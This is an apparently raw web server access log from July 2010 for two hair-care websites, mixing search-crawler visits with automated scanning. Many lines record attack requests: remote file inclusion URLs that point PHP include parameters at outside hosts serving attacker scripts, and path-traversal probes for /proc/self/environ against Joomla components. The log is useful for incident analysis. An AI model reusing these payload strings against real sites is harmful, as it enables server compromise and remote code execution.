66.135.41.16 - - [12/Jul/2010:09:53:12 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
114.108.151.149 - - [12/Jul/2010:09:53:28 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [12/Jul/2010:09:53:29 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [12/Jul/2010:09:53:30 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [12/Jul/2010:09:54:00 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [12/Jul/2010:09:54:01 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [12/Jul/2010:09:54:02 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
67.195.37.176 - - [12/Jul/2010:10:02:27 -0700] "GET /logs/access_100524.log HTTP/1.0" 200 2784909 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.228.235.93 - - [12/Jul/2010:10:09:57 -0700] "GET /logs/access_100614.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
91.142.209.202 - - [12/Jul/2010:10:10:45 -0700] "GET /logs/access_100607.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://maniacos.net/htaccess?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.142.209.202 - - [12/Jul/2010:10:10:46 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://maniacos.net/htaccess?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.142.209.202 - - [12/Jul/2010:10:10:46 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://maniacos.net/htaccess?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.195.114.60 - - [12/Jul/2010:10:11:11 -0700] "GET /logs/access_100405.log HTTP/1.0" 200 2516499 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
91.142.209.202 - - [12/Jul/2010:10:15:00 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://maniacos.net/htaccess?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
66.135.41.16 - - [12/Jul/2010:10:15:12 -0700] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
66.135.41.16 - - [12/Jul/2010:10:15:12 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
66.135.41.16 - - [12/Jul/2010:10:15:12 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
66.135.41.16 - - [12/Jul/2010:10:15:49 -0700] "GET /logs/access_100607.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
66.135.41.16 - - [12/Jul/2010:10:15:49 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
66.135.41.16 - - [12/Jul/2010:10:15:49 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
66.135.41.16 - - [12/Jul/2010:10:15:50 -0700] "GET /logs/access_100614.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
67.195.37.176 - - [12/Jul/2010:10:20:20 -0700] "GET /logs/access_100614.log HTTP/1.0" 200 3596831 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
114.108.151.149 - - [12/Jul/2010:10:23:30 -0700] "GET /logs/access_100614.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [12/Jul/2010:10:23:34 -0700] "GET /logs/access_100614.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:10:27:59 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "growlonghairfast.com"
85.92.68.99 - - [12/Jul/2010:10:32:38 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.artbyvp.com/images/logo.db??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
85.92.68.99 - - [12/Jul/2010:10:32:38 -0700] "GET /logs/index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.artbyvp.com/images/logo.db??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
85.92.68.99 - - [12/Jul/2010:10:32:38 -0700] "GET /logs/access_091214.log/index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.artbyvp.com/images/logo.db??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
89.136.148.25 - - [12/Jul/2010:10:36:12 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/6.0 (compatible; MSIE 7.0a1; Windows NT 5.2; SV1)" "growlonghairfast.com"
89.136.148.25 - - [12/Jul/2010:10:36:12 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/6.0 (compatible; MSIE 7.0a1; Windows NT 5.2; SV1)" "growlonghairfast.com"
129.97.219.71 - - [12/Jul/2010:10:47:52 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "growlonghairfast.com"
91.214.44.59 - - [12/Jul/2010:10:59:49 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "growlonghairfast.com"
203.217.29.196 - - [12/Jul/2010:11:00:02 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.217.29.196 - - [12/Jul/2010:11:00:02 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.217.29.196 - - [12/Jul/2010:11:00:02 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
112.105.117.208 - - [12/Jul/2010:11:00:14 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 851968 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
66.249.65.235 - - [12/Jul/2010:11:03:07 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
217.113.61.155 - - [12/Jul/2010:11:04:40 -0700] "GET /bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
217.113.61.155 - - [12/Jul/2010:11:04:40 -0700] "GET /logs/access_100104.log//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
217.113.61.155 - - [12/Jul/2010:11:04:40 -0700] "GET /logs//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
208.115.111.245 - - [12/Jul/2010:11:07:10 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:11:07:11 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
66.249.65.213 - - [12/Jul/2010:11:07:31 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:11:07:38 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:11:10:48 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
94.45.33.18 - - [12/Jul/2010:11:25:03 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "growlonghairfast.com"
129.97.219.71 - - [12/Jul/2010:11:28:00 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2" "growlonghairfast.com"
75.125.185.98 - - [12/Jul/2010:11:28:02 -0700] "GET /logs/access.log/?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.freehairsecrets.com"
75.125.185.98 - - [12/Jul/2010:11:28:02 -0700] "GET /?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.836" "www.freehairsecrets.com"
75.125.185.98 - - [12/Jul/2010:11:28:03 -0700] "GET /logs/?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4799 "-" "libwww-perl/5.836" "www.freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:11:28:59 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13968 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:11:29:02 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16419 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:11:29:44 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16498 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:11:29:49 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16923 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:11:29:54 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17098 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:11:29:59 -0700] "GET /freehairsecretsphp/viewtopic.php?p=20969 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:11:30:04 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4365 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:11:30:09 -0700] "GET /logs/?D=D HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:11:30:14 -0700] "GET /freehairsecretsphp/viewtopic.php?p=11269 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:11:30:19 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18824 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
75.125.185.98 - - [12/Jul/2010:11:36:11 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.freehairsecrets.com"
75.125.185.98 - - [12/Jul/2010:11:38:14 -0700] "GET /logs/access.log//index.php?option=com_jce=add&Itemid=&mosConfig_absolute_path=http://yeshouse.mk.co.kr/lecture/cache?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
75.125.185.98 - - [12/Jul/2010:11:38:14 -0700] "GET /logs//index.php?option=com_jce=add&Itemid=&mosConfig_absolute_path=http://yeshouse.mk.co.kr/lecture/cache?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
75.125.185.98 - - [12/Jul/2010:11:38:15 -0700] "GET /index.php?option=com_jce=add&Itemid=&mosConfig_absolute_path=http://yeshouse.mk.co.kr/lecture/cache?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
75.125.185.98 - - [12/Jul/2010:11:40:10 -0700] "GET /logs/access.log%20%20//index.php?option=com_jce=add&Itemid=&mosConfig_absolute_path=http://yeshouse.mk.co.kr/lecture/cache?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
85.214.118.239 - - [12/Jul/2010:11:49:27 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.prigorje-info.com/includes/teeste.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "growlonghairfast.com"
85.214.118.239 - - [12/Jul/2010:11:49:29 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.prigorje-info.com/includes/teeste.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "growlonghairfast.com"
67.195.37.176 - - [12/Jul/2010:11:50:22 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [12/Jul/2010:11:50:45 -0700] "GET /?S=A HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [12/Jul/2010:11:50:52 -0700] "GET /?M=D HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
124.115.1.7 - - [12/Jul/2010:11:54:12 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15213 HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
203.217.29.196 - - [12/Jul/2010:12:09:09 -0700] "GET /logs/access_100621.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.217.29.196 - - [12/Jul/2010:12:09:09 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.217.29.196 - - [12/Jul/2010:12:09:10 -0700] "GET /logs/access_100621.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.217.29.196 - - [12/Jul/2010:12:09:10 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.217.29.196 - - [12/Jul/2010:12:09:11 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.217.29.196 - - [12/Jul/2010:12:09:11 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.217.29.196 - - [12/Jul/2010:12:09:20 -0700] "GET /logs/access_100621.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.214.44.59 - - [12/Jul/2010:12:09:21 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "freehairsecrets.com"
203.217.29.196 - - [12/Jul/2010:12:09:21 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.217.29.196 - - [12/Jul/2010:12:09:22 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
129.97.219.71 - - [12/Jul/2010:12:09:38 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2" "growlonghairfast.com"
203.217.29.196 - - [12/Jul/2010:12:09:48 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.217.29.196 - - [12/Jul/2010:12:09:49 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.217.29.196 - - [12/Jul/2010:12:10:04 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
217.14.6.210 - - [12/Jul/2010:12:16:14 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)" "growlonghairfast.com"
217.14.6.210 - - [12/Jul/2010:12:16:16 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17251 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)" "growlonghairfast.com"
217.14.6.210 - - [12/Jul/2010:12:16:22 -0700] "GET /freehairsecretsphp/viewtopic.php?p=3262 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)" "growlonghairfast.com"
217.14.6.210 - - [12/Jul/2010:12:16:34 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 851968 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)" "growlonghairfast.com"
78.41.204.220 - - [12/Jul/2010:12:26:04 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.postmytrips.com//flashservices/services/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.41.204.220 - - [12/Jul/2010:12:26:04 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.postmytrips.com//flashservices/services/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.41.204.220 - - [12/Jul/2010:12:26:04 -0700] "GET /logs/access_100607.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.postmytrips.com//flashservices/services/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.41.204.220 - - [12/Jul/2010:12:26:04 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.postmytrips.com//flashservices/services/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.41.204.220 - - [12/Jul/2010:12:26:04 -0700] "GET /logs/access_100607.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.postmytrips.com//flashservices/services/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.41.204.220 - - [12/Jul/2010:12:26:04 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.postmytrips.com//flashservices/services/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.7.54 - - [12/Jul/2010:12:26:37 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:12:30:24 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2" "growlonghairfast.com"
119.63.198.90 - - [12/Jul/2010:12:32:06 -0700] "GET /logs/access_091130.log HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "growlonghairfast.com"
119.63.198.116 - - [12/Jul/2010:12:32:17 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15444 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:12:32:26 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12134 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:12:32:27 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13063 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:12:32:28 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13243 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:12:32:28 -0700] "GET /freehairsecretsphp/viewtopic.php?p=20465 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:12:32:29 -0700] "GET /freehairsecretsphp/viewtopic.php?p=20897 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:12:32:30 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4803 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:12:32:31 -0700] "GET /freehairsecretsphp/viewtopic.php?p=9848 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:12:32:31 -0700] "GET /logs/access_090921.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:12:32:32 -0700] "GET /logs/access_090928.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:12:32:33 -0700] "GET /logs/access_091005.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
67.195.37.176 - - [12/Jul/2010:12:32:36 -0700] "GET /logs/ HTTP/1.0" 200 4783 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
119.63.198.95 - - [12/Jul/2010:12:32:41 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13285 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "growlonghairfast.com"
67.195.37.176 - - [12/Jul/2010:12:33:02 -0700] "GET /tmp/?S=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [12/Jul/2010:12:33:55 -0700] "GET /logs/access_100712.log HTTP/1.0" 200 3369302 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
85.214.118.239 - - [12/Jul/2010:12:45:24 -0700] "GET /logs//components/com_sef/sef.php?mosConfig.absolute.path=http://www.prigorje-info.com/includes/teeste.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "growlonghairfast.com"
